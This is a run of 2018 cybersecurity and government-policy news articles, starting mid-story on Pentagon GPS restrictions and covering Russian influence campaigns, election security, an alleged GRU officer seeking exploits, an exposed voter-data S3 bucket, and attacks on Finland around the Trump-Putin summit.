Defense personnel who aren't in sensitive areas will be able to use the GPS applications if the commanders conclude they don't present a risk. For example, troops exercising at major military bases around the country, such at Fort Hood in Texas or Norfolk Naval Station in Virginia, would likely be able to use the location software on their phones or fitness devices. Troops on missions in more sensitive locations, such as Syria, Iraq, Afghanistan or parts of Africa, meanwhile, would be restricted from using the devices or be required to turn off any location function.

Army Col. Rob Manning, a Pentagon spokesman, said it's a move to ensure the enemy can't easily target U.S. forces.

"It goes back to making sure that we're not giving the enemy an unfair advantage and we're not showcasing the exact locations of our troops worldwide," Manning said.

Concerns about exercise trackers and other electronic devices came to a head in January in the wake of revelations that an interactive, online map was pinpointing troop locations, bases and other sensitive areas around the world.

The Global Heat Map, published by the GPS tracking company Strava, used satellite information to map the locations of subscribers to Strava's fitness service. At the time, the map showed activity from 2015 through September 2017. And while heavily populated areas were well lit, warzones such as Iraq and Syria show scattered pockets of activity that could denote military or government personnel using fitness trackers as they move around.

The Pentagon immediately launched a review, noting that the electronic signals could potentially disclose the location of troops who are in secret or classified locations or on small forward operating bases in hostile areas.

This is the second memo affecting the use of cellphones and other electronic devices that the department has released in recent months. In May, defense officials laid out new restrictions for the use of cellphones and other mobile wireless devices inside the Pentagon.

That memo called for stricter adherence to long-held practices that require phones be left in storage containers outside secure areas where sensitive matters are discussed. But it also stopped short of banning the devices, and instead made clear that cellphones can still be used in common areas and other offices in the Pentagon if classified information is not present.

The latest memo says the new restrictions include GPS functions on fitness trackers, phones, tablets, smartwatches and other applications.

The Pentagon also said it will provide additional cybersecurity training to include the risks posed by the trackers and other mobile devices.

Heather Pierce, a spokeswoman for Fitbit, said Monday: "Fitbit is committed to protecting consumer privacy and keeping data safe. Unlike a smartphone, location data is not collected by Fitbit unless a user gives us access to the data, and users can always remove our access."

Russian troll factory suspected to be behind the attack against Italian President Mattarella
5.8.2018 securityweek BigBrothers

A Russian shadow hangs over the attack on Italian President Mattarella: a coordinated campaign on Twitter in which hundreds of profiles invited him to resign.
Cybersecurity experts and Italian media believe that Italian President Sergio Mattarella is the latest victim of the Russian troll farm.

In the late afternoon of May 27, thousands of Twitter profiles suddenly started spreading messages against the Italian president asking him to resign.

The messages appeared to be a coordinated attack: they were using the hashtag #MattarellaDimettiti (Italian for “Mattarella resign”). Messages using this hashtag rapidly spread across the Internet, many legitimate users started using it as well, and it is quite easy to find similar legitimate messages today.

But someone triggered the protest online, someone with a clear interest in destabilizing the Italian government.

The current vice-premier Luigi Di Maio was asking for the indictment of President Mattarella, who had refused to endorse a candidate for Minister of Economy because of his known anti-euro position.

The analysis of Twitter activity revealed that at around two o’clock in the morning there was an anomalous spike in the number of messages against President Mattarella.

President Mattarella

Were they sleepless Italians, or was someone attempting to influence the sentiment of the population on specific topics?

According to the Huffington Post Italy, in just a few minutes about 400 new profiles appeared, all traced back to a single origin coordinating the misinformation campaign.

The Huffington Post reported that the Italian law enforcement agency Polizia Postale confirmed that the campaign had a single source, but that, due to the countermeasures adopted by the attackers, it was impossible to find the control room and attribute the attack to a specific threat actor.

“It is well known that, with high probability, it should have been created abroad, even if no one is able to say whether the Russian operators involved in disruptive actions in the American election campaign are involved,” states the Huffington Post, citing the Italian newspaper Corriere della Sera.

According to the Huffington Post, at least twenty of the Twitter profiles involved in the attack against Italian President Mattarella, belonging to completely unsuspecting Italians, had been used one or more times by the Internet Research Agency (IRA) of Saint Petersburg, also known as the Russian troll factory.

The same accounts were involved in other propaganda campaigns in favor of populist parties, sovereignists, and anti-Europeans.

This is the conclusion of an analysis conducted on a sample comprising 67% of the archive of Internet Research Agency (IRA) activity that was published by the FiveThirtyEight website.

The website published 3 million Russian troll tweets that were analyzed by US prosecutor Robert Mueller as part of the investigation into Russian influence on the 2016 Presidential election.

The huge number of tweets was collected by the researchers Darren Linvill and Patrick Warren of Clemson University.

The archive includes roughly 16,000 tweets in the Italian language; according to the Italian newspaper Corriere della Sera, some of the accounts were particularly active and were fueling discussions against government representatives.

Now let me close with a simple consideration … the propaganda online attributed to the Internet Research Agency is really very noisy, and I fear it was designed to be so, likely under a wider diversionary strategy.

By involving more sophisticated technologies it is possible to obtain better results; let’s think of the involvement of artificial intelligence.

Putin said several times that the nation that leads in AI ‘will be the ruler of the world,’ and I’m sure that the involvement of machine learning systems in a troll factory can produce results much better than actual ones.

Is the Internet Research Agency itself the product of a bigger troll farm that already leverages artificial intelligence?

Trump Criticized for Not Leading Effort to Secure Elections
2.8.2018 securityweek BigBrothers

WASHINGTON (AP) — As alarms blare about Russian interference in U.S. elections, the Trump administration is facing criticism that it has no clear national strategy to protect the country during the upcoming midterms and beyond.

Both Republicans and Democrats have criticized the administration's response as fragmented, without enough coordination across federal agencies. And with the midterms just three months away, critics are calling on President Donald Trump to take a stronger stand on an issue critical to American democracy.

"There's clearly not enough leadership from the top. This is a moment to move," said Maryland Sen. Chris Van Hollen, head of the Democratic Senatorial Campaign Committee. "I don't think they are doing nearly enough."

Various government agencies have been at work to ensure safe voting. The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression.

But Trump himself rarely talks about the issue. And in the nearly two years since Russians were found to have hacked into U.S. election systems and manipulated social media to influence public opinion, the White House has held two meetings on election security.

One was last week. It ran 30 minutes.

The meeting resulted in no new presidential directive to coordinate the federal effort to secure the election, said Suzanne Spaulding, former undersecretary of homeland security who was responsible for cyber security and protecting critical infrastructure.

"Trump's failure to take a leadership role on this, up until this (National Security Council) meeting, misses an opportunity to send a clear message to states that this is a very serious threat," Spaulding said. "We did not get out of this NSC meeting a comprehensive, interagency strategy. It was each department and agency working in their silos."

Garrett Marquis, a spokesman for the NSC, said the government response is robust. He said NSC staff "leads the regular and continuous coordination of the whole-of-government approach to addressing foreign malign influence and ensuring election security."

At a cybersecurity summit on Tuesday, Vice President Mike Pence said he was confident officials could prevent further meddling by foreign agents.

"We will repel any efforts to interfere in our elections," he said.

Republican Sen. Lindsey Graham of South Carolina said government agencies are "doing a lot of good work, but nobody knows about it." He lamented Trump's contradictory statements about whether he accepts the U.S. intelligence assessment that Russia meddled in the 2016 presidential election.

"What I think he needs to do is lead this nation to make sure the 2018 election is protected," Graham said recently on CBS' "Face the Nation." "He needs to be the leader of the movement — not brought to the dance reluctantly. So, I hope he will direct his government, working with Congress, to harden the 2018 election before it's too late."

The debate over safeguarding U.S. elections comes as evidence of cyber threats piles up. Facebook announced Tuesday that it has uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms.

The company said it removed 32 accounts from Facebook and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts.

Earlier this month, Microsoft said it discovered that a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said Monday that additional analysis has confirmed that the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., has said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017.

Sen. Jeanne Shaheen, D-N.H., who is not running for re-election, told The Associated Press on Monday that someone contacted her office "claiming to be an official from a country."

A frequent critic of Russia, Shaheen said she didn't know if Moscow was behind the email received in November but had turned the matter over to the FBI.

Shaheen said another senator had been targeted besides McCaskill. "It's my understanding that there is, but I don't want to speak for other senators," she said. When asked if it was a Democratic senator, Shaheen nodded yes.

"People on both sides of the aisle have been beating the drum for two years now about the need for somebody to be accountable for cybersecurity across the government," Shaheen said.

National Intelligence Director Dan Coats said U.S. intelligence officials continue to see activity from individuals affiliated with the Internet Research Agency, whose members were indicted by U.S. special counsel Robert Mueller. Coats said they create new social media accounts disguised as those of Americans, then use the fake accounts to drive attention to divisive issues in America.

In the Obama administration, synchronizing federal agencies' work on election security would have likely been the job of the White House cybersecurity coordinator. Trump's national security adviser, John Bolton, abolished the post in May to remove a layer of bureaucracy from the NSC flow chart.

Under the current structure, the point man for election security is Rear Adm. Douglas Fears. Trump tapped Fears in early June as his deputy assistant to the president and homeland security and counterterrorism adviser.

Fears oversees the election security and other portfolios of the NSC's Cybersecurity Directorate and coordinates the federal government's response to disasters.

Homeland Security Secretary Kirstjen Nielsen says cyber threats are "an urgent, evolving crisis."

"Our adversaries' capabilities online are outpacing our stove-piped defenses," Nielsen said Tuesday. "In fact, I believe that cyber threats collectively now exceed the danger of physical attacks against us. This is a major sea change for my department and for our country's security."

Leaked Chats Show Alleged Russian Spy Seeking Hacking Tools
2.8.2018 securityweek BigBrothers

MOSCOW (AP) — Six years ago, a Russian-speaking cybersecurity researcher received an unsolicited email from Kate S. Milton.

Milton claimed to work for the Moscow-based anti-virus firm Kaspersky. In an exchange that began in halting English and quickly switched to Russian, Milton said she was impressed by the researcher's work on exploits — the digital lock picks used by hackers to break into vulnerable systems — and wanted to be copied in on any new ones that the researcher came across.

"You almost always have all the top-end exploits," Milton said, after complimenting the researcher about a post to her website, where she often dissected malicious software.

"So that our contact isn't one-sided, I'd offer you my help analyzing malicious viruses, and as I get new samples I'll share," Milton continued. "What do you think?"

The researcher — who works as a security engineer and runs the malware-sharing site on the side — always had a pretty good idea that Milton wasn't who she said she was. Last month, she got confirmation via an FBI indictment.

The indictment, made public on July 13, lifted the lid on the Russian hacking operation that targeted the 2016 U.S. presidential election. It identified "Kate S. Milton" as an alias for military intelligence officer Ivan Yermakov, one of 12 Russian spies accused of breaking into the Democratic National Committee and publishing its emails in an attempt to influence the 2016 election.

The researcher, who gave her exchanges with Milton to The Associated Press on condition of anonymity, said she wasn't pleased to learn she had been corresponding with an alleged Russian spy. But she wasn't particularly surprised either.

"This area of research is a magnet for suspicious people," she said.

The researcher and Milton engaged in a handful of conversations between April 2011 and March 2012. But even their sparse exchanges, along with a few digital breadcrumbs left behind by Yermakov and his colleagues, offer insight into the men behind the keyboards at Russia's Main Intelligence Directorate, or GRU.

It isn't unusual for messages like Milton's to come in out of the blue, especially in the relatively small world of independent malware analysts.

"There was nothing particularly unusual in her approach," the researcher said. "I had very similar interactions with amateur and professional researchers from different countries."

The pair corresponded for a while. Milton shared a piece of malicious code at one point and sent over a hacking-related YouTube video at another, but contact fizzled out after a few months.

Then, the following year, Milton got back in touch.

"It's been all work, work, work," Milton said by way of apology, before quickly getting to the point. She needed new lock picks.

"I know that you can help," she wrote. "I'm working on a new project and I really need contacts that can provide information or have contacts with people who have new exploits. I am willing to pay for them."

In particular, Milton said she wanted information on a recently disclosed vulnerability codenamed CVE-2012-0002 - a critical Microsoft flaw that could allow hackers to remotely compromise some Windows computers. Milton had heard that someone had already cobbled together a working exploit.

"I'd like to get it," she said.

The researcher demurred. The trade in exploits — for use by spies, cops, surveillance companies or criminals — can be a seedy one.

"I usually steer clear from any wannabe buyers and sellers," she told the AP.

She politely declined - and never heard from Milton again.

Milton's Twitter account — whose profile photo features "Lost" star Evangeline Lilly — is long dormant. The last few messages carry urgent, awkwardly worded appeals for exploits or tips about vulnerabilities.

"Help me find detailed description CVE-2011-0978," one message reads, referring to a bug in PHP, a coding language often used for websites. "Need a work exploit," the message continues, ending with a smiley face.

It isn't clear whether Yermakov was working for the GRU when he first masqueraded as Kate S. Milton. Milton's Twitter silence — starting in 2011 — and the reference to a "new project" in 2012 might hint at a new job.

In any case, Yermakov wasn't working for the anti-virus firm Kaspersky — not then and not ever, the company said in a statement.

"We don't know why he allegedly presented himself as an employee," the statement said.

Messages sent by the AP to Kate S. Milton's Gmail account were not returned.

The exchanges between Milton (Yermakov) and the researcher could be read in different ways.

They might show that the GRU was trying to cultivate people in the information security community with an eye toward getting the latest exploits as soon as possible, said Cosimo Mortola, a threat intelligence analyst at the cybersecurity company FireEye.

It's also possible that Yermakov might have initially worked as an independent hacker, hustling for spy tools before being hired by Russian military intelligence — a theory that makes sense to defense and foreign policy analyst Pavel Felgenhauer.

"For cyber, you have to hire boys that understand computers and everything the old spies at the GRU don't understand," Felgenhauer said. "You find a good hacker, you recruit him and give him some training and a rank — a lieutenant or something — and then he will do the same stuff."

The leak of Milton's conversations shows how the glare of publicity is revealing elements of the hackers' methods — and perhaps even hints about their private lives.

It's possible, for example, that Yermakov and many of his colleagues commute to work through the arched entrance to Komsomolsky 22, a military base in the heart of Moscow that serves as home to the alleged hacker's Unit 26165. Photos shot from inside show it's a well-kept facility, with a czarist-era facade, manicured lawns, flower beds and shady trees in a central courtyard.

The AP and others have tried to trace the men's digital lives, finding references to some of those indicted by the FBI in academic papers on computing and mathematics, on Russian cybersecurity conference attendee lists or — in the case of Cpt. Nikolay Kozachek, nicknamed "kazak" — written into the malicious code created by Fancy Bear, the nickname long applied to the hacking squad before their identities were allegedly revealed by the FBI.

One of Kozachek's other nicknames also appears on a website that allowed users to mine tokens for new weapons to use in the first-person shooter videogame "Counter Strike: Global Offensive" — providing a flavor of the hackers' extracurricular interests.

The AP has also uncovered several social media profiles tied to another of Yermakov's indicted colleagues — Lt. Aleksey Lukashev, allegedly the man behind the successful phishing of the email account belonging to Hillary Clinton's campaign chairman, John Podesta.

Lukashev operated a Twitter account under the alias "Den Katenberg," according to an analysis of the indictment as well as data supplied by the cybersecurity firm Secureworks and Twitter's "Find My Friends" feature.

A tipster using the Russian facial recognition search engine FindFace recently pointed the AP to a VKontakte account that, while using a different name, appears active and features photos of the same young, Slavic-looking man.

Many of his posts and his friends appear to originate from a district outside Moscow known as Voskresensky. The photos show him cross-country skiing at night, wading in emerald waters somewhere warm and visiting Yaroslavl, an ancient city northwest of Moscow. One video appeared to show Russia's 2017 Spasskaya Tower Festival, a military music festival popular with officers.

The AP could not establish with certainty that the man on the VKontakte account is Lukashev. Several people listed as friends either declined to comment when approached by the AP or said Lukashev's name was unknown to them.

Shortly thereafter, the profile's owner locked down his account, making his vacation snaps invisible to outsiders.

The exchanges between the cybersecurity researcher and Kate S. Milton are available here.

DHS Unveils National Risk Management Center
1.8.2018 securityweek   BigBrothers

Kirstjen Nielsen introduces National Risk Management Center

Secretary of Homeland Security Kirstjen Nielsen said on Tuesday that the U.S. Department of Homeland Security (DHS) has launched the National Risk Management Center, a joint center housed within DHS that will enable the private sector and government to collaborate and devise solutions to reduce risk to critical infrastructure.

Announced at the DHS National Cybersecurity Summit today in New York City, the new center will focus on three things:

● Identify, assess, and prioritize efforts to reduce risks to national critical functions, which enable national and economic security;

● Collaborate on the development of risk management strategies and approaches to manage risks to national functions; and

● Coordinate integrated cross-sector risk management activities.

According to the DHS, the center will lead a series of activities that will help “define what is truly critical; create the frameworks by which government and industry collectively manage risk; and initiate specific cross-sector activities to address known threats.”

Notable attendees and participants at the Summit include Vice President Mike Pence, Secretary of Energy Rick Perry, FBI Director Christopher Wray, and General Paul M. Nakasone, Commander of U.S. Cyber Command and Director of the National Security Agency.

A live stream of the event can be watched online throughout the day.

Senator Urges Federal Agencies to Ditch Adobe Flash
28.7.2018 securityweek BigBrothers

United States Senator Ron Wyden on Wednesday sent a letter to national agencies demanding a collaboration on ending the government use of Adobe Flash.

Set to reach an end-of-life status in 2020, Adobe’s Flash Player is continually plagued by critical vulnerabilities. Two zero-days in the software were patched this year alone, but not before threat actors had exploited them in targeted attacks.

Immediately after Adobe announced plans to kill off the plugin a year ago, Apple, Facebook, Google, Microsoft and Mozilla outlined plans to completely remove support for Flash from their products as well.

Sent to National Institute of Standards and Technology (NIST) Director Walter G. Copan, National Security Agency Director General Paul M. Nakasone, and Department of Homeland Security Secretary Kirstjen Nielsen, Senator Wyden’s letter (PDF) requests the end of government use of Flash by August 2019.

Senator Wyden cites not only the looming end of technical support for Flash, but also the inherent security vulnerabilities in the plugin as the main reason to dispose of it.

“Flash is widely acknowledged by technical experts to be plagued by serious, largely unfixable cybersecurity issues that could allow attackers to completely take control of a visitor’s computer, reaching deep into their digital life,” the letter reads.

The United States Computer Emergency Readiness Team (US-CERT) warned about the risks of using Flash nearly a decade ago, the letter also notes.

“The U.S. government should begin transitioning away from Flash immediately, before it is abandoned in 2020,” Senator Wyden says. He also noted that the federal government has previously failed to transition from decommissioned software, as was the case with Windows XP, which cost millions for premium support after its end-of-life in 2014.

The three agencies, he says, provide the majority of cybersecurity guidance to government agencies, so they should ensure that federal workers are protected from cyber threats.

“To date, your agencies have yet to issue public guidance for the unavoidable transition away from Flash. A critical deadline is looming – the government must act to prevent the security risk posed by Flash from reaching catastrophic levels,” the letter reads.

The Senator asks NIST, NSA, and DHS to mandate that no new Flash-based content should be deployed on federal websites within 60 days and that all Flash-based content should be removed from the federal websites by August 1, 2019.

Flash should also be removed from the agencies’ employees’ computers by that date, Wyden said.

Cybersecurity, Compliance Slowing U.S. Government's Digital Transformation
24.7.2018 securityweek BigBrothers

Complex Compliance Requirements are Delaying U.S. Government's Digital Transformation, Study Shows

With trust in the U.S. government at an all-time low (the Pew Research Center says that only 3% of Americans trust Washington to do the right thing 'just about always'), the suggestion is that a new 'moonshot moment' is necessary for government. A new report (PDF) says that moment is possible with digital transformation.

Success, however, is dependent on three requirements: federal agencies must create a culture of innovation; must prioritize the citizen experience; and must implement an integrated approach to digital transformation.

Consulting firm ICF employed Wakefield Research to survey 500 federal employees to understand the opportunities and obstacles for federal digital transformation. The prize, says ICF, is reigniting citizen trust and satisfaction in government, regardless of the administration. Cybersecurity and compliance issues are among the greatest of the obstacles, with user satisfaction an additional problem.

Eighty-nine percent of the respondents said that security and privacy requirements significantly delay technological innovation. More than half of the respondents admitted to experiencing a cybersecurity incident after implementing a new digital initiative, while almost half of those said that the incident delayed future innovation.

The federal IT procurement process is also an inhibitor, with 91% of respondents saying it needs to be completely overhauled. More than 30% go so far as to recognize benefits in using unauthorized technologies that have not been officially sanctioned by the IT department.

ICF believes that the combination of security/compliance concerns and strict procurement policy is inhibiting the creativity of federal agencies. "Creating a culture of innovation," says the report, "requires encouraging staff within agencies to think outside the box and empowering them to follow through on new ideas by providing targeted support."

Baris Yener, an SVP at ICF, told SecurityWeek, "Compliance has become an overly-complex aspect of security in the government. This is due primarily to the fact that the public sector thinks of security as an afterthought, something that is tacked on to existing processes, rather than building solutions with a security-first mindset. Compliance will remain a hindrance," he added, "until the government and its agencies embrace a shift in thinking that prioritizes an integrated approach to creating tools and services. Once that shift takes place, and stakeholders from across departments are brought together, compliance will be simpler."

In the meantime, he does not believe that empowering creativity will necessarily lead to an unacceptable expansion of shadow IT within federal agencies.

"By embracing outside-the-box thinking, and fostering a culture that encourages creativity," he said, "those staff members will instead raise their hand to offer new solutions, rather than turn to shadow IT. Creative thinking needs to be nurtured and rewarded. If there's anything we know about the nature of cybersecurity today, it's that the threat landscape is constantly changing. Feds with a different perspective will be critical to navigating uncharted territory."

Essential to the moonshot moment of digital transformation is user engagement with the outcome. Ninety-seven percent of the survey respondents say that government agencies now have a greater responsibility than ever to provide the digital tools and services that will make a positive difference in citizens' lives. But 80% also said that government is prioritizing perfecting the technology over the citizen experience.

The extent to which regulations affect new digital technology can be seen in the 44% of respondents who say that compliance is the biggest priority when implementing a new digital technology, with 36% saying that speed of implementation is the prime priority. User adoption of that technology ranks second to last (30%), beaten only by the ability to measure its success (23%).

With such driving principles, ICF sees little chance of government maximizing the potential for engaging the trust of citizens. Federal staff accept the problem, with 92% suggesting that improving usability of the technology should be prioritized over technology development. "Instead of looking to the private sector primarily for technology solutions," suggests ICF, "federal leaders must implement user research and feedback loops that are designed to create and improve digital services."

This may seem a little surprising, since the issue of usability is understood and being tackled by new technologies in the private sector. The big development is the increasing use of artificial intelligence -- for example in reducing user friction in access control. However, Yener does not believe that such solutions can simply be transposed to the federal sector.

"For example," he told SecurityWeek, "when implementing new technologies like AI, the government needs to consider how to identify and document the standardization of those technologies, along with how it will be used within all agencies. Private sector by comparison has the freedom and flexibility to implement whatever would be beneficial to the business, with minimal standardization required or concern for other companies in their industry."

If project funding is available, the biggest obstacles to new digital developments are security concerns (41%), outdated policies (28%), skilled staff shortages (27%), complexity (22%), and lack of time (22%). Other obstacles include poor inter-office communication, difficulty in procuring services, and lack of support from senior management.

"To develop an integrated approach to digital transformation," says the report, "agencies should build a multidisciplinary team that executes technology implementation and prioritizes user adoption. Leaders need to ensure that every department -- including common omissions like HR -- is represented to better understand the needs of the entire organization as it works to apply digital transformation." Successful digital transformation, it adds, "will position the federal government to launch its next moonshot: digital transformation that reignites citizen trust and satisfaction in the government -- regardless of the administration."

EU Antitrust Officials Probe Thales, Gemalto Merger
24.7.2018 securityweek  BigBrothers

The European Union said Monday it has launched an anti-trust investigation into the planned purchase by French aerospace and defence group Thales of SIM manufacturer Gemalto.

The European Commission, the 28-nation EU's executive arm, said it wants to determine whether the merger will increase prices as well as reduce choice and innovation for customers of hardware security modules (HSM).

An HSM is hardware that runs encryption software to "generate, protect, and manage encryption keys used to protect data in a secure, tamper-resistant module," it said.

"Our society is increasingly dependent on data security solutions to secure all sorts of social, commercial or personal information," the EU's competition commissioner Margrethe Vestager said in a statement.

"We are opening this in-depth investigation to ensure that the proposed transaction between Thales and Gemalto would not lead to higher prices or less choice in hardware security modules for customers looking to safely encrypt their data," Vestager added.

In a deal valued at about 4.8 billion euros, Thales agreed in December to buy Gemalto, based in the Netherlands, outbidding French competitor Atos.

With the merger, Thales is aiming to become a global leader in digital security.

The commission expressed concern that the merger would reduce players in the market.

Gemalto is active in mobile platforms and services, mobile embedded software and products, smart cards, identification documents, government programs, machine to machine communication, and enterprise security.

The Commission said it has until 29 November to take a decision.

Experts believe US Cyber Command is the only entity that can carry out ‘hack backs’
23.7.2018 securityaffairs BigBrothers

The U.S. government should opt to carry out hack backs as retaliation against the massive attacks against organizations in the US private sector.
The U.S. government should opt to carry out hack backs as retaliation against the massive attacks against organizations in the US private sector, and when appropriate, the military’s hacking unit should hit back, this is what three experts said at a panel organized by APCO.

The three experts, with experience in the private sector, the intelligence community and the military, agreed that private organizations that fall victim to cyber attacks have to delegate the response against the attackers to US Cyber Command.

“I think if it’s going to happen, it’s best in the hands of the government,” said Sean Weppner, chief strategy officer at NISOS Group and a former DOD cyber officer.

The experts highlighted that private companies lack both the intelligence capabilities needed to attribute an attack to a specific threat actor and the offensive capabilities needed to conduct hack backs.

Private companies not only lack the capabilities to conduct hack backs, they are also not legally authorized to do so.

“The U.S. government should decide how to retaliate against the worst attacks on the country’s private sector, and when appropriate, the military’s hacking unit should hit back, three experts said Monday.” reported CyberScoop.

“The controversial idea entails taking the fight to nefarious actors by attacking their computer network in-kind, probing for exfiltrated data and employing measures to retrieve or destroy stolen information.”

Alex Bolling, the former chief of operations at the CIA’s Information Operations Center, addressed the problem of cyber attacks against critical infrastructure, which in most cases is owned by private entities.

The response to attacks against critical infrastructure operated by private organizations must be delegated to the US Government.

In the majority of cases, attacks against critical infrastructure are carried out by persistent attackers, and for this reason a response requires specific cyber skills, which US CYBERCOM has.

Speaking of CYBERCOM, Bolling said it is the “agency that is best resourced to respond to threats to [U.S.] national interests…[and] critical infrastructure in the energy, finance and wider commercial space.”

Hack backs the Air Force

Private companies cannot carry out hack backs if we want to avoid a digital Wild West. A private company that decides to target its attackers is, in any case, a serious threat to the wider digital community.

“For one, companies venturing out into foreign networks would run the risk of disrupting existing U.S. intelligence or military operations.” continues CyberScoop.

According to Edward Amoroso, CEO of Tag Cyber, US CYBERCOM should isolate the specific target and attack it in a way that limits the risk of collateral damage.

“I’d like to think there’s a lot of human intelligence and spy-craft that provides a really good view” to the government, said Amoroso.

Experts also warn of the risk of hacking back a party that was not responsible, due to a wrong attribution of the attack.

Of course, every threat must be properly addressed, especially those that target the U.S. private sector daily. The three experts urge proper cyber hygiene to mitigate the risk of cyber attacks and limit the need to carry out hack backs.

Robocalling Firm Exposes U.S. Voter Records
22.7.2018 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and had already been indexed by the searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

The Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files, including audio files with pre-recorded political messages for robocalls (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robocent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured access to the S3 bucket and its files after being responsibly alerted to the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.

Trump-Putin Meeting Puts Finland on Cyber-Attack Target List
22.7.2018 securityweek BigBrothers

Historically, Finland has not been targeted by a high number of cyber-attacks, but digital assaults spiked in the days prior to the July 16 meeting between U.S. President Donald Trump and Russian President Vladimir Putin in Helsinki.

The massive rise in cyber-attacks isn’t surprising, given the precedent established earlier this year, when Singapore received a massive wave of attacks from June 11 to June 12, during the Trump-Kim summit.

While most of the cyber-attacks observed during President Trump’s meeting with the North Korean leader appeared to originate from Russia, those observed last week were mainly launched from China, F5 reports.

The Finland and Singapore cyber-attacks showed some similarities in targeted ports, which included SIP port 5060, which is typically used by VoIP phones (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

The most attacked port in the new wave of assaults, however, was SSH port 22, followed by SMB port 445. SSH is often used for the secure remote administration of Internet of Things (IoT) devices, but vendors often ship devices with easily guessable credentials, which turns these products into easy targets for cybercriminals.

“The device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks,” F5 notes.

The Finland assaults also targeted ports that weren’t seen in the Singapore attacks, including HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Despite the massive spike in cyber-attacks targeting Finland between July 12 and July 15, the country remained far behind the top targeted countries. Compared to Canada, which typically makes it into the top 10 but not the top 5, Finland received only a small fraction of cyber-attacks on July 12 and July 14 and “doesn’t even register on the chart,” F5 says.

The top targeting countries during the spike were China (29%), United States (14%) and France (9%), followed by Italy (8%) and Russia (7%). Many of the attacks originated from networks usually seen launching such attacks, the security researchers say.

ChinaNet, consistently at the top of the threat actor network list globally, remained the top attacking network during the attack spike.

Such attacks, F5 notes, are possible because of the rise of poorly secured IoT devices. By targeting vulnerable devices, nation-states, spies, mercenaries, and others can easily launch attacks against anyone.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 notes.

Trump-Putin Meeting was the root cause of a spike of cyber attacks against Finland
22.7.2018 securityaffairs  BigBrothers

F5 experts observed a spike in the attacks in the days prior to the Trump-Putin meeting on July 16 that was held in Helsinki, Finland.
Important events attract cyber attacks: in June we discussed the Trump-Kim summit and how Singapore, which hosted it, was hit by an unprecedented number of attacks from June 11 to June 12.

At the time, most of the cyber attacks originated in Russia.

Let’s analyze the effect in cyberspace of another event, the Trump-Putin meeting held in Helsinki, Finland, a country that historically has not been a favored target of hackers.

The experts pointed out that they have no data to suggest the attacks against Finland were successful.

Once again, researchers at security firm F5 analyzed the number of attacks that hit the host location during the summit and made an interesting discovery: most of the cyber attacks originated in China.

“On July 16th, President Trump met with Vladimir Putin in Helsinki, Finland. As expected, attacks against Finland skyrocketed days before the meeting. What’s interesting this time around is that Russia wasn’t the top attacker—perhaps because Trump was meeting with Putin? In this case, China was the top attacker.” reports the security firm F5.

Trump-Putin attacks

Experts observed many similarities between the attacks against the countries that hosted the two meetings. Hackers targeted the same ports, including SIP port 5060, typically used by VoIP systems (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

Most of the attacks targeted SSH port 22 which is typically used for the secure remote administration of Internet of Things (IoT) devices. Attackers scan for devices configured with default credentials to compromise them with brute force attacks.

The second most targeted port was the SMB port 445.

“The challenge is that the device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks.” continues F5.

Experts noticed that some ports targeted by the attacks during the Trump-Putin meeting were not hit during the Singapore summit, for example, the HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Experts highlighted that Finland is not included in the list of top-targeted countries.

Which were the other top targeting countries during the Helsinki meeting?

The top targeting countries were:

China (29%);
United States (14%);
France (9%);
Italy (8%);
Russia (7%).

According to F5, ChinaNet was the top attacking network during the attack spike.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 concludes.

Ecuador to withdraw asylum for Julian Assange in coming weeks or days
22.7.2018 securityaffairs  BigBrothers

According to media, Ecuador is going to hand over the WikiLeaks founder Julian Assange to the UK in “coming weeks or even days.”
